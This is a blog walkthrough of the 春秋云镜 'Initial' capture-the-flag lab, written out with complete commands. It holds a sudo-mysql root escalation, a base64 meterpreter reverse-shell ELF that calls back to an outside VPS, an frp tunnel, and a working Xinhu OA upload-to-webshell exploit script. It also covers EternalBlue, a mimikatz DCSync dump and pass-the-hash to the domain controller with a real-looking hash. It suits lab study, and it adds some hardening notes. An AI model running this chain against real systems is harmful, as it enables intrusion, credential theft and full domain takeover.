春秋云镜 Initial: full walkthrough with complete commands

References

https://blog.csdn.net/uuzeray/article/details/141316323

https://9anux.org/2024/08/01/春秋云境Initial详解/index.html

Environment & tools

Ubuntu VPS
with msf (Metasploit), frp and fscan installed

Local machine
with the ThinkPHP 莲花 (Lianhua) tool and 蚁剑 (AntSword) installed

flag01

Browsing to the IP shows a ThinkPHP application.

Run it through the Lianhua tool for a one-shot ThinkPHP exploit.

Connect with AntSword.

Reading /root needs privilege escalation.

There are no exploitable SUID binaries, so try sudo (sudo -l).

The sudo -l output lists mysql, meaning the current user may run the mysql client as root. The client's \! command hands whatever follows it to a shell via system(), so every command after \! runs as root.

First locate the flag:

sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null'

(The pattern must be double-quoted inside the single-quoted -e string; single quotes inside single quotes end the outer string early and the glob is passed unquoted.)

Then read the file:

sudo mysql -e '\! cat /root/flag/flag01.txt'

First flag:

flag{60b53231-

flag02

msf reverse shell

Start the handler on the VPS first:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST <your VPS public IP>   # must match the LHOST baked into the msfvenom payload below (47.109.49.107 here)
set LPORT 6666
exploit

Generate the reverse-shell ELF as a base64 string so it can be pasted into the target:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.109.49.107 LPORT=6666 -f elf | base64 -w 0

f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==

Copy it to the target and run it. Going through the same sudo mysql \! trick means the decoded binary starts as root, so the meterpreter session that calls back is a root session:

sudo mysql -e '\! echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" | base64 -d > /tmp/.X; chmod +x /tmp/.X; /tmp/.X &'
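Before pasting an opaque base64 blob into a root shell it is worth checking what it actually contains. The following Python is an added example, not code from the original post or from Metasploit: it decodes the stager above, checks the ELF header, compares the program header's p_filesz with the real size, and recovers the callback address from the sockaddr_in literal that this linux/x64 reverse_tcp stager embeds. The byte pattern it searches for (`48 b9 02 00 <port> <ip>` followed by `51 48 89 e6`, i.e. movabs rcx; push rcx; mov rsi, rsp) was taken from this particular blob and is an assumption about this stager version only; other payloads lay the address out differently.

```python
import base64
import re
import struct

# The base64 ELF from the post above (linux/x64/meterpreter/reverse_tcp, LHOST 47.109.49.107, LPORT 6666).
STAGER_B64 = "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g=="

# Assumed layout of the connect-back address in this stager:
#   48 b9 <sockaddr_in: family=2, port (big-endian), ipv4>   movabs rcx, imm64
#   51 48 89 e6                                              push rcx; mov rsi, rsp
SOCKADDR_RE = re.compile(rb"\x48\xb9\x02\x00(..)(....)\x51\x48\x89\xe6", re.DOTALL)


def inspect_stager(b64: str) -> dict:
    """Decode a base64 ELF stager and report what a reader should verify before running it."""
    data = base64.b64decode("".join(b64.split()))
    info = {
        "elf": data[:4] == b"\x7fELF",
        "size": len(data),
        "size_ok": False,   # p_filesz of the single PT_LOAD segment equals the real file size
        "lhost": None,
        "lport": None,
    }
    if info["elf"] and data[4] == 2:                      # EI_CLASS == ELFCLASS64
        e_phoff = struct.unpack_from("<Q", data, 32)[0]   # Elf64_Ehdr.e_phoff
        p_filesz = struct.unpack_from("<Q", data, e_phoff + 32)[0]  # Elf64_Phdr.p_filesz
        info["size_ok"] = p_filesz == len(data)
    m = SOCKADDR_RE.search(data)
    if m:
        info["lport"] = struct.unpack(">H", m.group(1))[0]       # sin_port is network byte order
        info["lhost"] = ".".join(str(b) for b in m.group(2))     # sin_addr as dotted quad
    return info


if __name__ == "__main__":
    result = inspect_stager(STAGER_B64)
    print(f"ELF: {result['elf']}, {result['size']} bytes, filesz matches: {result['size_ok']}")
    print(f"calls back to {result['lhost']}:{result['lport']}")
```

If the recovered address is not your own listener, or the header and size disagree, do not run the blob; the same check applied to a payload someone else hands you is the difference between a pivot and handing the box to a third party.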

Upload fscan and scan the internal network for services.

First get the current host's IP address.

Then scan the subnet for services.

Scan results:

172.22.1.2    DC (domain controller)
172.22.1.21   MS17-010 (EternalBlue)
172.22.1.18   /?m=login  信呼OA (Xinhu OA)

Set up an frp tunnel so the VPS can reach the intranet web app.

[image] https://pic1.imgdb.cn/item/694a08a112468c0fdca41a67.png

frpc.toml details:

serverAddr = "vps的ip"
serverPort = 7000

[[proxies]]
name = "web_test"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 8081
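The server side of the tunnel is not shown in the post. As an added example (not from the original), here is the matching frps/frpc pair in frp's TOML format with token authentication; the token value is a placeholder, and the VPS address is assumed. Without auth.token any frpc that can reach port 7000 on the VPS can register proxies through it, and note that remotePort 8081 is open to the entire internet while the tunnel is up, so the lab's OA login page is exposed to anyone who scans the VPS.

```toml
# ---- frps.toml, on the VPS ----
bindPort = 7000
auth.method = "token"
auth.token = "replace-with-a-long-random-value"   # placeholder; must match frpc

# ---- frpc.toml, on the compromised Linux host (the post's config plus the token) ----
serverAddr = "<vps ip>"
serverPort = 7000
auth.method = "token"
auth.token = "replace-with-a-long-random-value"

[[proxies]]
name = "web_test"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 8081
```

Tear the proxy down (or stop frpc) as soon as the web step is finished; the forward is a hole into the target network that outlives your interest in it.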

Use the exploit against 信呼OA (Xinhu OA) through the tunnel:

import sys

import requests
import urllib3

urllib3.disable_warnings()  # plain HTTP through the frp forward; silence the verify=False warning

session = requests.Session()
session.verify = False
session.headers.update({
    "User-Agent": "Mozilla/5.0"
})

# frp forward on the VPS: 47.109.49.107:8081 -> 172.22.1.18:80
url_pre = "http://47.109.49.107:8081"

# 1. Log in (the front end base64-encodes the credentials: admin / admin123)
login_url = url_pre + "/?a=check&m=login&d=&ajaxbool=true"

login_data = {
    "rempass": "0",
    "jmpass": "false",
    "device": "1625884034525",
    "ltype": "0",
    "adminuser": "YWRtaW4=::",      # admin
    "adminpass": "YWRtaW4xMjM=",    # admin123
    "yanzm": ""
}

r = session.post(login_url, data=login_data, timeout=10)
print("\n[+] Login status:", r.status_code)
print("[+] Login response:")
print(r.text)

# If this is not JSON the login failed; stop here
try:
    login_json = r.json()
except ValueError:
    print("[-] Login did not return JSON, stop.")
    sys.exit(1)

# 2. Upload
upload_url = url_pre + "/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true"

with open("1.php", "rb") as fh:
    files = {
        # some CMS versions name the field "file", others "filedata"; try both
        "file": ("1.php", fh, "image/jpeg")
    }
    r = session.post(upload_url, files=files, timeout=10)

print("\n[+] Upload status:", r.status_code)
print("[+] Upload headers:", r.headers.get("Content-Type"))
print("[+] Upload response:")
print(r.text)

# Force JSON parsing
try:
    upload_json = r.json()
except ValueError:
    print("[-] Upload did not return JSON, stop.")
    sys.exit(1)

print("[+] Upload JSON keys:", list(upload_json.keys()))

# Fall back across the field names seen in different versions
file_id = upload_json.get("id") or upload_json.get("fileid")
filepath = upload_json.get("filepath") or upload_json.get("path")

print("[+] file_id:", file_id)
print("[+] filepath:", filepath)

if not file_id:
    print("[-] No file_id, cannot continue")
    sys.exit(1)

# 3. Trigger task.php on the uploaded file id
task_url = url_pre + f"/task.php?m=qcloudCos|runt&a=run&fileid={file_id}"

r = session.get(task_url, timeout=10)
print("\n[+] Task trigger status:", r.status_code)
print("[+] Task response:")
print(r.text)

# 4. Try the file directly (some environments do not need the task step)
if filepath:
    if ".uptemp" in filepath:
        filepath = "/" + filepath.split(".uptemp")[0] + ".php"
    elif not filepath.startswith("/"):
        filepath = "/" + filepath

    shell_url = url_pre + filepath
    print("\n[+] Try access uploaded file:")
    print(shell_url)

    r = session.get(shell_url, timeout=10)
    print("[+] Shell access response:")
    print(r.text)

I ran a script rewritten with AI; the original one would not work for some reason.

Connect with AntSword.

I could not find this path myself either; I took it from the writeup.

flag02: 2ce3-4813-87d4-

flag03

First exploit the EternalBlue host (172.22.1.21) found by the scan. The meterpreter session from flag02 is the pivot: before running the module, add a route for 172.22.1.0/24 through that session (post/multi/manage/autoroute) so msf on the VPS can reach the host at all.

Why a bind payload here: through a pivot, as through a SOCKS proxy, msf can only open connections from the attacker towards the intranet ("I connect to them").

A reverse payload would need the Windows host to connect back to the VPS ("they connect to me"), which only works with a forward such as frp. A bind payload sidesteps that.

# 1. Put the current session in the background
background

# 2. Select the EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue

# 3. Set the target IP
set RHOSTS 172.22.1.21

# 4. Bind payload (bind_tcp_uuid): msf connects in to the target over the pivot route
set payload windows/x64/meterpreter/bind_tcp_uuid

# 5. Run the exploit
exploit

With SYSTEM on 172.22.1.21, go after the domain controller.

First load mimikatz (kiwi) to dump credentials:

load kiwi
Loading extension kiwi... 
.#####.  
mimikatz 2.2.0 20191125 (x64/windows)  
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)  
## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)  
## \ / ##      > http://blog.gentilkiwi.com/mimikatz  
 '## v ##'   Vincent LE TOUX (vincent.letoux@gmail.com)  
 '#####'     > http://pingcastle.com / http://mysmartlogon.com  
 ***/  
Success.

Then run DCSync; the goal is the NTLM hash of Administrator or of any other domain admin. This only succeeds because the account msf authenticates as (SYSTEM on a domain member uses the machine account) has replication rights on the domain; against a normally configured member server the DC would refuse the request.

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

Then pass the hash (PTH) to the DC with psexec. SMBPass takes the LM:NT pair; modern DCs store no LM hash, so the LM half is the well-known empty-LM value aad3b435b51404eeaad3b435b51404ee, followed by the NT hash from the DCSync output. The payload is bind_tcp again for the same reason as above.

use exploit/windows/smb/psexec

set RHOSTS 172.22.1.2
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8
set SMBDomain xiaorang.lab

set PAYLOAD windows/x64/meterpreter/bind_tcp

exploit

more C:\Users\Administrator\flag\flag03.txt

flag03: e8f88d0d43d6}

Summary & takeaways

Basic structure of an internal network and the concept of a domain

Intranet tunnelling with frp

Basic use of msf

The basic workflow of an internal penetration test

posted @ 2025-12-23 11:37 by L3yNn3H